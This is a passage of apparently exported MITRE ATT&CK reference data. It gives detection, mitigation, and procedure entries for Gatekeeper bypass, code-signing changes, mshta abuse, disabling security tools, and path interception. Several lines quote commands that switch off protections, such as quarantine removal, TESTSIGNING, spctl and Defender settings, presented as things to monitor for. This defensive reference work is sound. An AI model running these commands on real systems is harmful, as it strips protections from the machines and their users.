If running with elevated privileges, [OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the &lt;code&gt;spctl&lt;/code&gt; command to disable Gatekeeper protection for a downloaded file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. [OSX/Shlayer](https://attack.mitre.org/software/S0402) has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)(Citation: objectivesee osx.shlayer apple approved 2020)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses the command &lt;code&gt;xattr -d com.apple.quarantine&lt;/code&gt; to remove the quarantine file attribute used by Gatekeeper.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: 20 macOS Common Tools and Techniques)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).(Citation: Application Bundle Manipulation Brandon Dalton)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for the execution of commands that could modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;. (Citation: Microsoft TESTSIGNING Feb 2021)
Process Creation
Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;. (Citation: Microsoft TESTSIGNING Feb 2021)
Windows Registry Key Modification
Consider monitoring for modifications made to Registry keys associated with code signing policies, such as &lt;code&gt;HKCU\Software\Policies\Microsoft\Windows NT\Driver Signing&lt;/code&gt;. Modifications to the code signing policy of a system are likely to be rare.
Boot Integrity
Use of Secure Boot may prevent some implementations of modification to code signing policies.(Citation: Microsoft TESTSIGNING Feb 2021)
Privileged Account Management
Limit the usage of local administrator and domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries.
Restrict Registry Permissions
Ensure proper permissions are set for the Registry to prevent users from modifying keys related to code signing policies.
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used malware to turn off the &lt;code&gt;RequireSigned&lt;/code&gt; feature which ensures only signed DLLs can be run on Windows.(Citation: FBI FLASH APT39 September 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has modified variables in kernel memory to turn off Driver Signature Enforcement after exploiting vulnerabilities that obtained kernel mode privileges.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has enabled the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option to facilitate loading of a driver component.(Citation: F-Secure BlackEnergy 2014)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.(Citation: FireEye HIKIT Rootkit Part 2)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) can use CVE-2017-15303 to disable Windows Driver Signature Enforcement (DSE) protection and load its driver.(Citation: Trend Micro Iron Tiger April 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
File Creation
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Process Creation
Use process monitoring to monitor the execution and arguments of mshta.exe.
Disable or Remove Feature or Program
Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.
Execution Prevention
Use application control configured to block execution of &lt;code&gt;mshta.exe&lt;/code&gt; if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the &lt;code&gt;mshta.exe&lt;/code&gt; application and to prevent abuse.(Citation: Microsoft WDAC)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors executed JavaScript code via `mshta.exe`.(Citation: Cylance Dust Storm)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has use `mshta` to execute malicious scripts on a compromised host.(Citation: ESET T3 Threat Report 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used mshta.exe to execute malicious VBScript.(Citation: TrendMicro Confucius APT Feb 2018) 
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FIN7 April 2017)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used `mshta.exe` to execute malicious HTA files.(Citation: Symantec Shuckworm January 2022)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used mshta.exe to run malicious scripts on the system.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;mshta.exe&lt;/code&gt; to execute HTML pages downloaded by initial access documents.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used `mshta.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citation: MalwareBytes LazyScripter Feb 2021) 
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used mshta.exe to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload and to pass a PowerShell one-liner for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used mshta.exe to launch collection scripts.(Citation: Secureworks BRONZE PRESIDENT December 2019)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has utilized `mshta.exe` to execute a malicious hta file.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used &lt;code&gt;mshta.exe&lt;/code&gt; to execute malicious payloads.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used `mshta` to execute scripts including VBS.(Citation: Cisco Operation Layover September 2021)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used mshta.exe to execute malicious payloads.(Citation: Unit 42 TA551 Jan 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20-301A Kimsuky)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) 
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018) 
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) can use mshta.exe to execute an HTA file hosted on a remote server.(Citation: Symantec Shuckworm January 2022)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for the execution of commands and arguments associated with disabling or modification of security software processes or services such as &lt;code&gt;Set-MpPreference-DisableScriptScanning 1&lt;/code&gt; in Windows,&lt;code&gt;sudo spctl --master-disable&lt;/code&gt; in macOS, and &lt;code&gt;setenforce 0&lt;/code&gt; in Linux. Furthermore, on Windows monitor for the execution of taskkill.exe or Net Stop commands which may deactivate antivirus software and other security systems. 
Driver Load
Monitor for unusual/suspicious driver activity, especially regarding EDR and drivers associated with security tools as well as those that may be abused to disable security products.
Host Status
Lack of expected log events may be suspicious. Monitor for telemetry that provides context for modification or deletion of information related to security software processes or services such as Windows Defender definition files in Windows and System log files in Linux.
Process Creation
In an attempt to avoid detection after compromising a machine, threat actors often try to disable Windows Defender. This is often done using “sc” [service control], a legitimate tool provided by Microsoft for managing services. This action interferes with event detection and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.
Note: Though this analytic is utilizing Event ID 1 for process creation, the arguments are specifically looking for the use of service control for querying or trying to stop Windows Defender.
&lt;h4&gt;Analytic 1 - Detecting Tampering of Windows Defender Command Prompt&lt;/h4&gt;
&lt;code&gt;target_processes = filter processes where ((exe="C:\\Windows\\System32\\sc.exe") AND (command_line="sc *config*" OR command_line="sc *stop*" OR command_line="sc *query*"))&lt;/code&gt;
Process Termination
Monitor processes for unexpected termination related to security tools/services. Specifically, before execution of ransomware, monitor for rootkit tools, such as GMER, PowerTool or TDSSKiller, that may detect and terminate hidden processes and the host antivirus software.
Service Metadata
Monitor for telemetry that provides context of security software services being disabled or modified. In cloud environments, monitor virtual machine logs for the status of cloud security agents. Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation.
Note: Stopping services events are Windows Event Code 7036.
&lt;h4&gt;Analytic 1 - User Activity from Stopping Windows Defensive Services&lt;/h4&gt;
&lt;code&gt;log_name == "System" AND
event_code == "7036"
param1 in ["Windows Defender", "Windows Firewall"] AND
param2 == "stopped"&lt;/code&gt;
Windows Registry Key Deletion
Monitor for deletion of Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Microsoft\AMSI\Providers.
Windows Registry Key Modification
Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender.
Execution Prevention
Use application control where appropriate, especially regarding the execution of tools outside of the organization's security policies (such as rootkit removal tools) that have been abused to impair system defenses. Ensure that only approved security applications are used and running on enterprise systems.
Restrict File and Directory Permissions
Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security services.
Restrict Registry Permissions
Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security services.
User Account Management
Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security services.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) modified in-registry internet settings to lower internet security. (Citation: Booz Allen Hamilton)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors disabled anti-virus and anti-spyware tools in some instances on the victim’s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.(Citation: McAfee Night Dragon)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used the service control manager on a remote system to disable services associated with security monitoring products.(Citation: Microsoft Deep Dive Solorigate January 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has disabled Purview Audit on targeted accounts prior to stealing emails from  Microsoft 365 tenants.(Citation: Mandiant APT29 Microsoft 365 2022)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to stop endpoint detection and response (EDR) tools on compromised systems.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has incorporated code into several tools that attempts to terminate anti-virus processes.(Citation: Trend Micro Tick November 2019)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has executed a batch script designed to disable Windows Defender on a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has deployed a utility script named &lt;code&gt;kill.bat&lt;/code&gt; to disable anti-virus.(Citation: FireEye FIN6 Apr 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered macros which can tamper with Microsoft Office security settings.(Citation: ESET Gamaredon June 2020)	
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can attempt to disable security features in Microsoft Office and Windows Defender using the &lt;code&gt;taskkill&lt;/code&gt; command.(Citation: Unit 42 Gorgon Group Aug 2018)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) used [PsExec](https://attack.mitre.org/software/S0029) to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.(Citation: Symantec WastedLocker June 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, [Lazarus Group](https://attack.mitre.org/groups/G0032) malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)(Citation: US-CERT SHARPKNOT June 2018). 
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has disabled antivirus services on targeted systems in order to upload malicious payloads.(Citation: DFIR Report APT35 ProxyShell March 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) can disable the system's local proxy settings.(Citation: Trend Micro Muddy Water March 2021)
Putter Panda
Malware used by [Putter Panda](https://attack.mitre.org/groups/G0024) attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).(Citation: CrowdStrike Putter Panda)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018)  has attempted to disable built-in security protections such as Windows AMSI. (Citation: Proofpoint TA2541 February 2022)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used malware to disable Windows Defender.(Citation: Korean FSI TA505 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.(Citation: ESET Turla PowerShell May 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: Mandiant FIN12 Oct 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has the capability to kill any running analysis processes and AV software.(Citation: Fortinet Agent Tesla June 2017)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) looks for and attempts to stop anti-malware solutions.(Citation: Arxiv Avaddon Feb 2021)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) can stop anti-virus services on a compromised host.(Citation: Sogeti CERT ESEC Babuk March 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.(Citation: NCC Group Team9 June 2020)	
Brave Prince
[Brave Prince](https://attack.mitre.org/software/S0252) terminates antimalware processes.(Citation: McAfee Gold Dragon)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) can change browser security settings to enable extensions to be installed. [Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;pkill cfprefsd&lt;/code&gt; command to prevent users from inspecting processes.(Citation: MacKeeper Bundlore Apr 2019)(Citation: 20 macOS Common Tools and Techniques)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.(Citation: Prevx Carberp March 2011)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) can alter the victim's proxy configuration.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Clop
[Clop](https://attack.mitre.org/software/S0611) can uninstall or disable security products.(Citation: Cybereason Clop Dec 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) terminates various services related to system security and Windows.(Citation: SANS Conficker)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like anti-virus.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can attempt to stop security software.(Citation: Fortinet Diavol July 2021)
Donut
[Donut](https://attack.mitre.org/software/S0695) can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related [Native API](https://attack.mitre.org/techniques/T1106) functions to avoid process termination.(Citation: Donut Github)	
EKANS
[EKANS](https://attack.mitre.org/software/S0605) stops processes related to security and management software.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) can disable SELinux Role-Based Access Control and deactivate PAM modules.(Citation: ESET Ebury Oct 2017)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has disabled Windows Defender to evade protections.(Citation: Intrinsec Egregor Nov 2020)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) terminates anti-malware processes if they’re found running on the system.(Citation: McAfee Gold Dragon)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to disable Microsoft Outlook's security policies to disable macro warnings.(Citation: Cybereason Cobalt Kitty 2017)	
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Security Center, and Windows Defender.(Citation: Cisco H1N1 Part 2)
HDoor
[HDoor](https://attack.mitre.org/software/S0061) kills anti-virus found on the victim.(Citation: Baumgartner Naikon 2015)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has modified DNS resolvers to evade DNS monitoring tools.(Citation: Unit 42 Hildegard Malware)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a feature to disable Windows Task Manager.(Citation: Imminent Unit42 Dec2019)	
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can lower security settings by changing Registry keys.(Citation: Microsoft PLATINUM April 2016)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.(Citation: MalwareBytes LazyScripter Feb 2021)
LockerGoga
[LockerGoga](https://attack.mitre.org/software/S0372) installation has been immediately preceded by a "task kill" command in order to disable anti-virus.(Citation: Wired Lockergoga 2019)
Maze
[Maze](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020) It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.(Citation: Sophos Maze VM September 2020)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) was used to kill endpoint security processes.(Citation: IBM MegaCortex)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has a function to kill processes associated with defenses and can prevent certain processes from launching.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) 
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.(Citation: Check Point Meteor Aug 2021)
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) can change Internet Explorer settings to reduce warnings about malware activity.(Citation: Proofpoint Leviathan Oct 2017)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's anti-virus.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can disable Microsoft Office Protected View by changing Registry keys.(Citation: FireEye MuddyWater Mar 2018)
Proton
[Proton](https://attack.mitre.org/software/S0279) kills security tools like Wireshark that are running.(Citation: objsee mac malware 2017)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has the capability to stop antivirus services and disable Windows Defender.(Citation: CERT-FR PYSA April 2020) 
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.(Citation: Group IB Ransomware September 2020)
REvil
[REvil](https://attack.mitre.org/software/S0496) can connect to and disable the Symantec server on the victim's network.(Citation: Cylance Sodinokibi July 2019)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to terminate/stop processes and services associated with endpoint security products.(Citation: Sophos Ragnar May 2020)
RobbinHood
[RobbinHood](https://attack.mitre.org/software/S0400) will search for Windows services that are associated with antivirus software on the system and kill the process.(Citation: CarbonBlack RobbinHood May 2019) 
RunningRAT
[RunningRAT](https://attack.mitre.org/software/S0253) kills antimalware running process.(Citation: McAfee Gold Dragon)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has stopped services related to anti-virus.(Citation: FireEye Ryuk and Trickbot January 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692)'s `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions.(Citation: GitHub SILENTTRINITY Modules July 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.(Citation: FireEye SUNBURST Additional Details Dec 2020)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) has the ability to set SELinux to permissive mode.(Citation: Trend Micro Skidmap)
SslMM
[SslMM](https://attack.mitre.org/software/S0058) identifies and kills anti-malware processes.(Citation: Baumgartner Naikon 2015)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) can add directories used by the malware to the Windows Defender exclusions list to prevent detection.(Citation: Talos Promethium June 2020)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) uses the function &lt;code&gt;kill_unwanted&lt;/code&gt; to obtain a list of running processes and kills each process matching a list of security related processes.(Citation: wardle evilquest parti)
TinyZBot
[TinyZBot](https://attack.mitre.org/software/S0004) can disable Avira anti-virus.(Citation: Cylance Cleaver)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can disable Windows Defender.(Citation: Trend Micro Trickbot Nov 2018)
Unknown Logger
[Unknown Logger](https://attack.mitre.org/software/S0130) has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.(Citation: Forcepoint Monsoon)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can disarm Windows Defender during the UAC process to evade detection.(Citation: Check Point Warzone Feb 2020)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\ drive.(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can kill AV products' processes.(Citation: Talos ZxShell Oct 2014) 
macOS.OSAMiner
[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has searched for the Activity Monitor process in the System Events process list and kills the process if running. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.(Citation: SentinelLabs reversing run-only applescripts 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also,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Process Creation
Monitor for newly executed processes for process executable paths that are named for partial directories.
Windows Registry Key Modification
Monitor for modifications of PATH environment variable Registry keys such as &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path&lt;/code&gt;. An adversary can add a new directory or list of directories before other locations where programs can be executed from.
Audit
Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.
Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)
Execution Prevention
Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )
Restrict File and Directory Permissions
Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.
Empire
[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: Github PowerShell Empire)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may gather the victim's physical location(s) that can be used during targeting. Detecting the use of environmental keying may be difficult depending on the implementation.
Process Creation
Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection. Detecting the use of environmental keying may be difficult depending on the implementation.
Do Not Mitigate
[Environmental Keying](https://attack.mitre.org/techniques/T1480/001) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.
APT41
[APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)
Equation
[Equation](https://attack.mitre.org/groups/G0020) has been observed utilizing environmental keying in payload delivery.(Citation: Kaspersky Gauss Whitepaper)(Citation: Kaspersky Equation QA)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can use Data Protection API to encrypt its components on the victim’s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.(Citation: ESET InvisiMole June 2020)
PowerPunch
[PowerPunch](https://attack.mitre.org/software/S0685) can use the volume serial number from a target host to generate a unique XOR key for the next stage payload.(Citation: Microsoft Actinium February 2022)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) relies on a specific victim hostname to execute and decrypt important strings.(Citation: Volexity InkySquid RokRAT August 2021)
Winnti for Windows
The [Winnti for Windows](https://attack.mitre.org/software/S0141) dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.(Citation: Novetta Winnti April 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may gather information about the victim's business relationships that can be used during targeting. Detecting the use of guardrails may be difficult depending on the implementation.
Process Creation
